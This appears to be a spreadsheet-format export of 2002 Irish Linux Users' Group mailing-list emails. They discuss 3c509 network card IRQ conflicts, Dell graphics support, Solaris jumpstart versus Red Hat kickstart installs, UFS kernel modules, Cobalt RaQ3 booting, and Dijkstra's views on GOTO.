&gt; Aug  4 11:31:51 mira kernel: address 00 10 5a 3e 0e 48, IRQ 5.
&gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
&gt; Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
&gt; Aug  4 11:31:51 mira kernel: eth1: 3c5x9 at 0x300, 10baseT port,
&gt; Aug  4 11:31:51 mira kernel: address 00 10 5a be 0e 48, IRQ 10.
&gt; Aug  4 11:31:51 mira kernel: 3c509.c:1.18 12Mar2001 becker@scyld.com
&gt; Aug  4 11:31:51 mira kernel: http://www.scyld.com/network/3c509.html
&gt; 
&gt; This results in the interface(s) coming up but while packets can go
&gt; out they can not come in.
&gt; 
&gt; I've tried not loading the 3c509 mdule on bootup and then `modload
&gt; 3c509 IRQ=10` bit it still gets loaded as above, on IRQ 5 and 10. On
&gt; 2.2 it loads to IRQ 10.
&gt; I have been unable to get the 3c509 to work with 2.4.19 with an IRQ of
10 which works in 2.2.x okay. Can you use anyother irq for it.Sean- -- 
  Sean Rima                                http://www.tcob1.net
  Linux User:      231986          Jabber:   tcobone@jabber.org
  THE VIEWS EXPRESSED HERE ARE NOT NECESSARILY THOSE OF MY WIFE.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)
Comment: Use GPG for Secure MailiD8DBQE9TXFWHMnSWn2nApQRAg9VAKCOMO6oSAD8x6rkTl9QCvcD63vohACgtzPU
GWvz7cAuETfHwCouOW0NNIY=
=etR9
-----END PGP SIGNATURE------- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, Aug 04, 2002 at 06:55:49PM +0100, cout@eircom.net wrote:
&gt; You need to run the dos setup program for the 3c509 and turn off plug 'n' play in the card's firmware I think you will find.or you could:    a) make your lines less then 80 chars.
    b) not top-post.
    c) visit http://www.scyld.com/diag/ and turn off plug and play
       from a linux setup program.
    d) all of the above.
    moron) do none of the above.just a thought...kevin--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</si>
  <si>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Quoting cout@eircom.net (cout@eircom.net):&gt; You need to run the dos setup program for the 3c509 and turn off plug
&gt; 'n' play in the card's firmware I think you will find.As Kevin said, the problem can reputedly be solved using Donald Becker's 
Linux-native utilities for the 3C5X9 series.  Turn off PnP, and then set 
the IRQ and I/O base address as required.  Make sure those are also
made available in the motherboard BIOS Setup program to "Legacy ISA
devices" or whatever it's called, there.-- 
Cheers,              "It ain't so much the things we don't know that get us
Rick Moen            in trouble.  It's the things we know that ain't so."
rick@linuxmafia.com             -- Artemus Ward (1834-67), U.S. journalist-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Yea, I tried the VESA driver but it doesn't seem to want to work,
it's kinda weird actually, when I run Xconfigurator, the test 
comes up ok sometimes but when I try to load X it won't come
up at all.I read the intel page, I think I'll just throw this on the back burner
until intel bring out a driver for this.Thanks for your help though.On Fri, Aug 02, 2002 at 03:19:53AM -0500, Stephen_Reilly@dell.com wrote:
&gt; &gt;&gt; I swear to god you have to be so carefull with dell machines 
&gt; &gt;&gt; and linux. 
&gt; ...
&gt; &gt;&gt; to have some cheapo piece of hardware (eth card, modem, 
&gt; &gt;&gt; sound, graphics )
&gt; &gt;&gt; that is incompatable/unsupported. 
&gt; ...
&gt; &gt;&gt; with some crap
&gt; &gt;&gt; dell machine that 
&gt; yes, yes, all terribly insightful and extremely useful information.
&gt;  
&gt; &gt; We just got some new Dell GX260 machines here are work and 
&gt; &gt; I'm supposed to
&gt; &gt; be putting Linux on them. I tried installing RedHat 7.3. It 
&gt; &gt; just didn't want
&gt; &gt; to know about the graphics card. I's an onboard Intel DVMT chip. No
&gt; &gt; dedicated memory, it takes it from the onboard RAM.
&gt; The onboard DVMT card has an Intel 845 G/GL chipset.
&gt; http://www.intel.com/support/graphics/linux/ or
&gt; http://www.intel.com/support/graphics/intel845g/linux.htm has more specific
&gt; information. There is help available there.
&gt; 
&gt; I also found somewhere (not through personal experience though) that
&gt; 2.4.19-pre10ac2 includes drivers for the chipset ?
&gt; 
&gt; Steve
&gt; 
&gt; 
&gt; -- 
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt; List maintainer: listmaster@linux.ie-- 
---------------------------------------
Declan Houlihan
deccy@csn.ul.ie
http://deccy.csn.ul.ie/
----------------------------------------- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">This is the problem, it's not the people who buy the machine that
end up installing on it.We're actually investigating switching from Sparc/Solaris to 
Intel/Linux. I would much prefer to be using Linux at work
so I'm pushing for this. It definately doesn't help when 
you're given a bog standard Dell box and linux won't work
with the graphics card on it.At the moment at work, if we want a new workstation, we just
buy whatever Sun's latest system is, we jumpstart it, and 
that's it, it's up and running.
Basically the whole installation procedure is
"boot net - install"
This is exactly what you need when you are administering a large
group of workstations. You don't have the time to check dells
website every time you want to buy a machine, you'd spend
your life on Dells website and messing around with drivers
and compiling new versions of X. That's fine if you've got
one machine at home, hey, I've done it myself, but
when working with a large bunch of systems, it's impossible.
On Fri, Aug 02, 2002 at 04:02:38AM -0500, Stephen_Reilly@dell.com wrote:
&gt; &gt; bad thing. Just a bad thing for those that hope a distro will 
&gt; &gt; work out of
&gt; &gt; the box.
&gt; 
&gt; 	It's still quite easy to find out, pre-purchase, what components if
&gt; any are going to give you problems with a specific distribution/version.
&gt; With Dell just check the support.dell.com site, match the system, look for
&gt; downloadable drivers. From these if there aren't any linux drivers you can
&gt; usually find out the chipset of each device. Plug them into google with
&gt; "linux" and see what people have to say about them. Generally speaking when
&gt; you buy the system you'll be told the make/model of each device rather than
&gt; the chipset, so further investigation is necessary.
&gt; 
&gt; 	The cavaet, of course, is always to know exactly what you're buying.
&gt; In most people's cases unfortunately it's not the person who bought the
&gt; systems that will be configuring them.
&gt; 
&gt; steve
&gt; 
&gt; 
&gt; -- 
&gt; Irish Linux Users' Group: ilug@linux.ie
&gt; http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
&gt; List maintainer: listmaster@linux.ie-- 
---------------------------------------
Declan Houlihan
deccy@csn.ul.ie
http://deccy.csn.ul.ie/
----------------------------------------- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Declan Houlihan (deccy@csn.ul.ie):&gt; We're actually investigating switching from Sparc/Solaris to 
&gt; Intel/Linux. I would much prefer to be using Linux at work
&gt; so I'm pushing for this. It definately doesn't help when 
&gt; you're given a bog standard Dell box and linux won't work
&gt; with the graphics card on it.(1) Quibble:  For values of "work" limited to X11, not console support.(2) Decent substitute graphics cards with well-tested XFree86 support
are cheap.  Swap the problematic one out, and save it for some other
workstation later.  For that matter, somebody with a Win32 system
containing such a card might be ecstatic over the opportunity to swap.(3) Welcome to the Linux world, where we've known for... oh... about
eleven years that you fail to research chipsets before installation at
your peril.-- 
Cheers,   The difference between common sense and paranoia is that common sense
Rick Moen     is thinking everyone is out to get you.  That's normal; they are.
rick@linuxmafia.com      Paranoia is thinking they're conspiring.  -- J. Kegler-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all,
I'm trying to get wins name resolution across subnets working and reckon the
first step is to be 
able to do a nmblookup without using the -B (broadcast address flag). Does
anyone know how 
samba can be configured to do broadcasts to subnets other than just the
local subnet. 
I don't think this has anything to do with the remote announce parameter.Thanks
Bryan
"And the smoke of their torment ascendeth up for ever and ever: and they
have no rest day nor night, 
who worship the beast and his image, and whosoever receiveth the mark of his
name."
(Revelation 14:11)-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Declan Houlihan mentioned:
&gt; We're actually investigating switching from Sparc/Solaris to
&gt; Intel/Linux.And then:
&gt; At the moment at work, if we want a new workstation, we just
&gt; buy whatever Sun's latest system is, we jumpstart it, and
&gt; that's it, it's up and running.Well, why not try Linux on Sparc. It works pretty well and I have not had
major issues with it. There are minor problems: like the serial console
drivers, but for workstation installs I suspect it will work fine.And you get a working version of your favourite KDE/Gnome desktop instead of
DTE, uhm, I mean CDE.&gt; Basically the whole installation procedure is
&gt; "boot net - install"Well, you have to add the workstation to the install server first.Talking of which, you can install Sparc Linux using this technique as well.
The image takes a while to load, but once this is done you can install in
the normal fashion.SuSe for Sparc works fine. I am using Debian because the Sun boxen I have
subverted do not have graphics consoles. It also just works.If you have a spare workstation, I am sure I could burn a couple of CD's for
you. (If I can find them.)-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</si>
  <si>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?Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 06, 2002 at 09:46:27AM +0100, Matthew French wrote:
&gt; Declan Houlihan mentioned:
&gt; &gt; We're actually investigating switching from Sparc/Solaris to
&gt; &gt; Intel/Linux.
&gt; 
&gt; And then:
&gt; &gt; At the moment at work, if we want a new workstation, we just
&gt; &gt; buy whatever Sun's latest system is, we jumpstart it, and
&gt; &gt; that's it, it's up and running.sorry, i missed this.  redhat supplies something similar called kickstart
(guess who inspired them?).  pc hardware is dumb, so you'll need to use
a floppy.  otoh, every jumpstart config i've seen required rarp plus
plugging the new box's ethernet+ip into a file.  a kickstart boot can
just use a dhcp server.kevin--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</si>
  <si>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At 13:06 06/08/2002, John P. Looney wrote:
&gt;[snip]
&gt;  There is a nice need 'add_install_client' script that you feed the
&gt;archtecture, ethernet address &amp; ip to, and it'll setup everything from
&gt;RARP to Bootparams for you. Very simple.Yep, very handy and easy enough.&gt;  This script takes a -d option, to boot via DHCP also. On the negative
&gt;side, Sun's terminal handling leaves a lot to be desired - it won't work
&gt;properly on a Wyse 120+ for instance, no matter what emulation mode the
&gt;Wyse is trying to do.True, SUN's terminal handling isn't the best in the world.&gt;  To do PC netbooting properly, you need an motherbard with a PXE BIOS.
&gt;Then you are flying.OR a network card with a BootRom installed, and BIOS support to boot of the 
network.&gt;  Heh, how hard would it be to get a PC with an OpenBoot prom ?You could burn a PROM yourself, if you'd wish. I believe that the netboot 
project would have a PROM you could download and burn, having the needed 
h/w of course.. ;)//Anders//
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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though.Kate
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,Thanks for the replies. It turns out that it was an IRQ conflict with an old 
sound card.Despite checking the BIOS and running the 3c509 setup utility on 
http://www.scyld.com/diag, the 2.4 kernel still picked a card on IRQ 5 and 10.It works fine now that the sound card is removed, but I'm still confused as to 
why this worked in 2.2.18 but not 2.4.19, seems like a regression to me...Thanks again,Cheers,
~AlOriginal question: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</si>
  <si>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 xml:space="preserve">&gt; It works fine now that the sound card is removed, but I'm still confused
&gt; as to
&gt; why this worked in 2.2.18 but not 2.4.19, seems like a regression to me...
&gt; 
&gt; Thanks again,
&gt; 
&gt; Cheers,
&gt; ~Al
Strange.I had the double IRQ problem with the 3c509 combo, 
and turning pnp off in the card's firware fixed it.As far as I remember the problem I was having was 
that the driver was assigning an IRQ to the card's
 RJ45 port and then another IRQ to it's BNC port,
 and then referenced the card via the second assigned irq,
 and turning off PnP in the card's firmware fixed that.You must be having a different error
Else
PnP is still turned on.
&lt;&gt;
Making sure the IRQ and io space you assign
the card in it's firmware is not in use by
any other ISA devices.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">At 13:30 06/08/2002, John P. Looney wrote:
&gt;On Tue, Aug 06, 2002 at 01:22:07PM +0100, Anders Holm mentioned:
&gt; &gt; &gt; Heh, how hard would it be to get a PC with an OpenBoot prom ?
&gt; &gt;
&gt; &gt; You could burn a PROM yourself, if you'd wish. I believe that the netboot
&gt; &gt; project would have a PROM you could download and burn, having the needed
&gt; &gt; h/w of course.. ;)
&gt;
&gt;  But the PROMs are for specific network cards, and all their are really is
&gt;a bootp/tftp client. Not the whole set of nice bits &amp; pieces you get with
&gt;an OpenBoot PROM.True, but would still enable you to do a network install without using boot 
floppies. Then again, boot floppies are cheaper, and easier to recreate 
when you'd like to do some changes to it. Gets messier when you'd have a 
boot image on a server, and the only way you can test it is to boot it over 
the network. In any case, it's just one option available.&gt;  AMD were talking of supporting it ages back, when the Athlon was looking
&gt;like it would just be on workstations from day one. They seemed to drop
&gt;it, and go for the crappy MSDOS compatible BIOS though.Too bad they didn't go with that then. Would have been so much nicer than 
the old MSDOS crap. I do like the OpenBoot idea actually. Especially being 
able to set the PROM to boot from whatever disk slice you'd want. No need 
to set that in lilo/grub any more in that case, since the OpenBoot rom 
takes care of that part for you. Then again, you wouldn't get a menu that 
allows you to choose what you want to boot. There's good and bad, all 
depending on what you want to do, I suppose. Sitting here and typing I'm 
realising that it is both a nice thing, and a nasty thing..Ah well, life sucks as well, some say.. ;)//Anders//
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Albert White - SUN Ireland wrote:
&gt; Hi,
&gt; 
&gt; Thanks for the replies. It turns out that it was an IRQ conflict with an old 
&gt; sound card.
&gt; 
&gt; Despite checking the BIOS and running the 3c509 setup utility on 
&gt; http://www.scyld.com/diag, the 2.4 kernel still picked a card on IRQ 5 and 10.
&gt; 
&gt; It works fine now that the sound card is removed, but I'm still confused as to 
&gt; why this worked in 2.2.18 but not 2.4.19, seems like a regression to me...I'm jumping in here since I'm just back on
ILUG after quite a long break, anyway...Alan Cox was mentioning that he might have borked
some PNP stuff lately. You could try 2.4.19-ac4
to see if it helps.PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 06 Aug 2002 12:56:17 BST, kevin lyda said:
&gt;
&gt;sorry, i missed this.  redhat supplies something similar called kickstart
&gt;(guess who inspired them?).  pc hardware is dumb, so you'll need to use
&gt;a floppy.  otoh, every jumpstart config i've seen required rarp plus
&gt;plugging the new box's ethernet+ip into a file.  a kickstart boot can
&gt;just use a dhcp server.Aye, but it'll still need a /boot/kickstart/$VER/$IP-kickstart won't it
to proceed automatically?  [or am I completely off track there?]-- 
	Niall-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,Matthew French:
&gt; Declan Houlihan mentioned:
&gt; &gt; We're actually investigating switching from Sparc/Solaris to
&gt; &gt; Intel/Linux.
Boo hisss *duck* :)&gt; Well, why not try Linux on Sparc. 
&gt;
&gt; And you get a working version of your favourite KDE/Gnome desktop instead of
&gt; DTE, uhm, I mean CDE.
um.. http://wwws.sun.com/software/star/gnome/ integrated into solaris.Of course then there's http://wwws.sun.com/software/solaris/freeware/ for 
solaris 9 which gives you afterstep and windowmaker among other stuff. My 
personal favourite at the moment is enlightenment which also has Solaris 
packages available for download.&gt; &gt; Basically the whole installation procedure is
&gt; &gt; "boot net - install"
&gt; Talking of which, you can install Sparc Linux using this technique as well.
&gt; The image takes a while to load, but once this is done you can install in
&gt; the normal fashion.
Out of curiosity, does `normal fashion` mean that you still have to do the 
interactive customisations or is it like Solaris jumpstart where you can 
specify everything on the install server, do `boot net - install` go home, and 
come in to a fully installed and patched desktop the next morning?&gt; There are minor problems: like the serial console drivers, but for workstation 
&gt; installs I suspect it will work fine.
I don't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couldn't resist!)valen@tuatha.org said:
&gt; side, Sun's terminal handling leaves a lot to be desired - it won't
&gt; work properly on a Wyse 120+ for instance, no matter what emulation
&gt; mode the Wyse is trying to do.
hmm... I'm not familiar with wyse stuff, but I only need to use the console 
when something breaks, then anything capable of something basic like vt100 at 
9600 8n1 seems to work  . Not sure why you'd need to worry about this much 
really, just set up jumpstart to install automatically then you don't need to 
look at the console at all.Cheers,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</si>
  <si>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 xml:space="preserve">On Tue, Aug 06, 2002 at 02:04:11PM +0100, Niall Brady wrote:
&gt; &gt;(guess who inspired them?).  pc hardware is dumb, so you'll need to use
&gt; &gt;a floppy.  otoh, every jumpstart config i've seen required rarp plus
&gt; &gt;plugging the new box's ethernet+ip into a file.  a kickstart boot can
&gt; &gt;just use a dhcp server.
&gt; Aye, but it'll still need a /boot/kickstart/$VER/$IP-kickstart won't it
&gt; to proceed automatically?  [or am I completely off track there?]it's been a while since i did a kickstart install.  my memory is that
you put a file on a standard redhat boot disk that essentially scripts
the install.  there are a slew of options - you can have it fetch it's
install script from a tftpd server for instance (similar to jumpstart),
or it can all be on the floppy.kevin--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</si>
  <si>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has anyone got information on enabling ffs support in
the kernel, i was looking around, and information on
the subject seems to be sparse. http://digital.yahoo.com.au - Yahoo! Digital How To
- Get the best out of your PC!-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,&gt; has anyone got information on enabling ffs support in
&gt; the kernel, i was looking around, and information on
&gt; the subject seems to be sparse. 
I have no clue about ffs but...In the 2.4 kernel source Documentation/Configure.help there are various kernel 
options CONFIG_JFF* that enable it.http://developer.axis.com/software/jffs/ and http://sources.redhat.com/jffs2/ 
are the URLs cited in that documentation. They have links to mailing lists and 
archives which may be able to answer more specific questions.If you mean Amiga ffs, then thats selectable in the kernel config also :)Cheers,
~Al-- 
Expressed in this posting are my opinions.  They are in no way related
to opinions held by my employer, Sun Microsystems.
Statements on Sun products included here are not gospel and may
be fiction rather than truth.-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">bryan roycroft wrote:
&gt; has anyone got information on enabling ffs support in
&gt; the kernel, i was looking around, and information on
&gt; the subject seems to be sparse. Is this to mount an OS-X partition?
The following would be of interest in that case:
http://marc.theaimsgroup.com/?l=linux-kernel&amp;m=101198676827824&amp;w=2summary is you should be able to mount FFS readonly,
and the config item probably UFS:[padraig@pixelbeat ~]$ grep UFS /boot/config-2.4.18-3
CONFIG_UFS_FS=m
# CONFIG_UFS_FS_WRITE is not setSo `modprobe ufs` should work on a standard RH7.3 install?PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
BAD MSG: &gt; And you get a working version of your favourite KDE/Gnome desktop
&gt; &gt; instead of DTE, uhm, I mean CDE.
&gt;
&gt; um.. http://wwws.sun.com/software/star/gnome/ integrated into solaris.Yeah yeah yeah. I tried it (over a year ago) and it sucked like a new vacuum
cleaner. Although I expect that it will be a lot better by now. What I would
really like to see is Gnome on one of the Sun Ray thin terminals.&gt; Out of curiosity, does `normal fashion` mean that you still have to do the
&gt; interactive customisations or is it like Solaris jumpstart where you can
&gt; specify everything on the install server, do `boot net - install` go home,
and
&gt; come in to a fully installed and patched desktop the next morning?Er, I mean normal fashion for a Linux install. This would be distro
specific, anyway.I am sure it would be possible to do an automated install with a few script
changes. I would not be surprised if Debian does this already.I do know that if you pass extra parameters on the boot command, they are
picked up by silo. So:
  boot disk linuxwould not prompt for selection but would boot straight through. From there
it is a matter of tftp'ing the correct config file and the install would be
automatic from there on.&gt; I don't see why this should be a _major problem. The prom (ie the "ok"
&gt; prompt)
&gt; is almost at the hardware level and hence dosent depend on the os so you
&gt; should be able to connect to that easily enough. Once the machine is
installed
&gt; cant you just log in over the network? The network is the computer after
all
&gt; (sorry couldn't resist!)The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case.I think if the console is ttya/ttyS0 it will drop into PROM. If it is
/dev/null then you do not get console messages but the box will shut down
properly.-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</si>
  <si>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 xml:space="preserve">Vincent Cunniffe wrote:
&gt; Does anyone have any practical experience with high-performance socket 
&gt; code in C++ under Linux, and is there any speed difference between unix 
&gt; domain sockets, loopback sockets, and a real ethernet interface if all 
&gt; of the packets are going from one process on the machine to another 
&gt; process on the same machine?In short yes. The more logic involved the longer
the CPU is executing it. I.E.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types.IBM are running a series comparing doze and Linux IPC mechanisms.
The socket (which references the others at the bottom) is here:
http://www-106.ibm.com/developerworks/linux/library/l-rt6/?t=gr,Redhat=SocketsThe following in google gave useful info also:
"linux IPC mechanisms compared"PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">JPL suggested:
&gt;  Recursion is only truely useful if you have an infinite stack. People
&gt; that think they have an infinite stack shouldn't be let near a compiler.Well, when studying engineering the rule of thumb was that infinity was 10
times bigger then the most you could expect to use.Therefore I believe in infinite stack.But I do not feel I am a compiler risk either. So where does this leave me?-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</si>
  <si>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&gt; Interesting. I've always wondered about things 'considered' to be bad. 
&gt; Example the GOTO, most languages support a goto of some sort, so are gotos really bad?Oh goodie. My final year project rears its head :-)&gt; Is a loop or a recursive call actually any better than a goto 
&gt; or is the goto used as a kind of common enemy of 
&gt; programming syntaxMuch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60-line chunks. :)However, "Go-to considered harmful" points out that to analyse (==debug) 
code, you need to be able to tell what the point of execution is, and 
what the values of the variables are at that point. This is an easy(tm) 
job if the code uses assignment, if(), for() and functions, but not if 
it uses GOTO. (See http://www.cs.utexas.edu/users/EWD/ewd02xx/EWD215.PDF 
for the full letter).Despite being one of Dijkstra's brain-damaged children who learned BASIC 
at an early age :) I never use GOTO anymore (or any of its bastard 
offspring like break, continue, fudged function calls with sleight of 
hand in the variables). My code is longer than it might be if I had used 
GOTO at a critical, handy point. However, code is a bit like networks - 
you always end up adding bits on where you didn't expect to - and the 
benefit is felt when another person (like myself but in three months 
time) is modifying or debugging it and doesn't have to go through the 
hassle of dealing with the impact of the GOTO.Dave
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">kevin lyda wrote:
&gt; speaking of things considered harmful, line lengths of over 80 chars
&gt; are considered harmful.  cut it out.:-) In fairness he was using webmail&gt; On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute wrote:
&gt; 
&gt;&gt;Interesting. I've always wondered about things 'considered' to be bad. 
&gt;&gt;Example the GOTO, most languages support a goto of some sort, so are
&gt;&gt;gotos really bad?
&gt; 
&gt; 
&gt; if used properly, they actually can make code more readable.  but those
&gt; proper occasions are quite rare really.  it's a good idea to avoid them
&gt; since over use of goto will create what niall calls "write-only code."Yes a clever term usually (and deservedly) attributed to perl.
Of course you can create write-only code in any language.
There's even a competition for obfuscated C code which is always
worth a look: http://www.es.ioccc.org/main.htmlPÃ¡draig.p.s. what sort of processing do you do with:
kevin+dated+1029235349.f17378@ie.suberic.net
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
schemers are often slagged of for that sort of thing 
they "know the Value of Everything, Cost of Nothing" 
did i get that the right way arround ?
--B-----Original Message-----
From: John P. Looney [mailto:valen@tuatha.org]
Sent: 08 August 2002 11:38
To: ilug@linux.ie
Subject: Re: [ILUG] slashdot EW Dijkstra humor
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code.&gt; Is a loop or a recursive call actually any better than a goto 
&gt; or is the goto used as a kind of common enemy of 
&gt; programming syntax
&gt; to make sure people use loops or recursion?
&gt; &lt;&gt; Recursion is only truely useful if you have an infinite stack. People
that think they have an infinite stack shouldn't be let near a compiler.&gt; Kind of makes you wonder about things considered to be 'good'.  For
&gt; example people bang on about polymorphism, but is there actually any
&gt; advantage in using an overloaded function based on class inheritance? I don't care, to be honest.Kate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</si>
  <si>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Yikes, hope he's not serious!-------- Original Message --------
Subject: Re: [bug, 2.5.29, IDE] partition table corruption?
Date: 08 Aug 2002 14:23:53 +0100
From: Alan Cox 
To: martin@dalecki.de[IDE specific argument snipped]Thank you for reminding me why I've given up on the 2.5 kernel ever
working. Fortunately free software is self correcting so the tree can be
forked into something workable
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 12:14:09 +0100, Matthew French wrote:
&gt; JPL suggested:
&gt; &gt;  Recursion is only truely useful if you have an infinite stack. People
&gt; &gt; that think they have an infinite stack shouldn't be let near a compiler.
&gt; 
&gt; Well, when studying engineering the rule of thumb was that infinity was 10
&gt; times bigger then the most you could expect to use.
&gt; 
&gt; Therefore I believe in infinite stack.I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predecessor's "add new entries to the end of its linked list" function
recursively called itself with each following link until the terminating
one showed up. Of course it died miserably when it ran out of stack. I'm
sure he felt he'd done a good days work when he planted that bomb for
me.C.
-- 
Caolan McNamara               |  caolan@skynet.ie  
http://www.skynet.ie/~caolan  |  +353 86 8161184
So much insanity, so little time...-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">speaking of things considered harmful, line lengths of over 80 chars
are considered harmful.  cut it out.On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute wrote:
&gt; Interesting. I've always wondered about things 'considered' to be bad. 
&gt; Example the GOTO, most languages support a goto of some sort, so are
&gt; gotos really bad?if used properly, they actually can make code more readable.  but those
proper occasions are quite rare really.  it's a good idea to avoid them
since over use of goto will create what niall calls "write-only code."
what a wonderful expression.  my professors would spend entire lectures
explaining that concept, and yet three little words convey it so well.kevin--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</si>
  <si>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Thought this was funny.
In the slashdot thread about
EW Dijkstra passing away on
tuesday, there was:GOTO Heaven
       Re:GOTO Heaven
       I'll bet he gets there by the shortest path.Referring to his "Goto considered harmful" etc.Sad to see these people go. 3 others I've
noticed lately were: Richard Stevens, Jim Ellis
and Jon Postel.PÃ¡draig.
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve"> Try this little problem on for size: I've installed Redhat 7.3 on a raq3's disk. But fscked if I can get the
kernel in /boot/vmlinuz-2.4.18-3 to boot. It's insisting pulling the
kernel from ... somewhere else. The old cobalt kernel. I've booted the disk with a redhat rescue CD, and installed grub on the
MBR and hda1 &amp; hda2 (just in case). No luck. The cobalt BIOS says "Booting
default method - From disk". Any ideas how I can get this thing to boot *my* kernel ? Anyone care to
guess how the cobalt boot process ? Google seems very quiet on the
subject of the cobalt boot process, and what is there doesn't seem to
work. Simple stuff like: (how to boot a different kernel)
 http://list.cobalt.com/pipermail/cobalt-developers/1999-December/022014.html And, on boot:Cobalt:Main Menu&gt; bfd /boot/vmlinuz-2.4.18-3
First stage kernel: Decompressing - done
Second stage kernel: Decompressing - done
Linux version 2.2.16C28 (konkers@unicron.cobalt.com) Note the descrepancy between what I want to boot, and actually booted.Kate-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; 
&gt; Thought this was funny.
&gt; In the slashdot thread about
&gt; EW Dijkstra passing away on
&gt; tuesday, there was:
&gt; 
&gt; GOTO Heaven
&gt;        Re:GOTO Heaven
&gt;        I'll bet he gets there by the shortest path.
&gt; 
&gt; Referring to his "Goto considered harmful" etc.
&gt; 
&gt; Sad to see these people go. 3 others I've
&gt; noticed lately were: Richard Stevens, Jim Ellis
&gt; and Jon Postel.
&gt; 
&gt; Pï¿½draig.Interesting. I've always wondered about things 'considered' to be bad. 
Example the GOTO, most languages support a goto of some sort, so are gotos really bad?Is a loop or a recursive call actually any better than a goto 
or is the goto used as a kind of common enemy of 
programming syntax
to make sure people use loops or recursion?
&lt;&gt;Kind of makes you wonder about things considered to be 'good'.
For example people bang on about polymorphism, but is there actually any advantage in using an overloaded function based on class inheritance?Hmm.I'm only laughing on the outside 
My smile is just skin deep 
If you could see inside I'm really crying 
You might join me for a weep.
&lt;&gt;
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">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code.&gt; Is a loop or a recursive call actually any better than a goto 
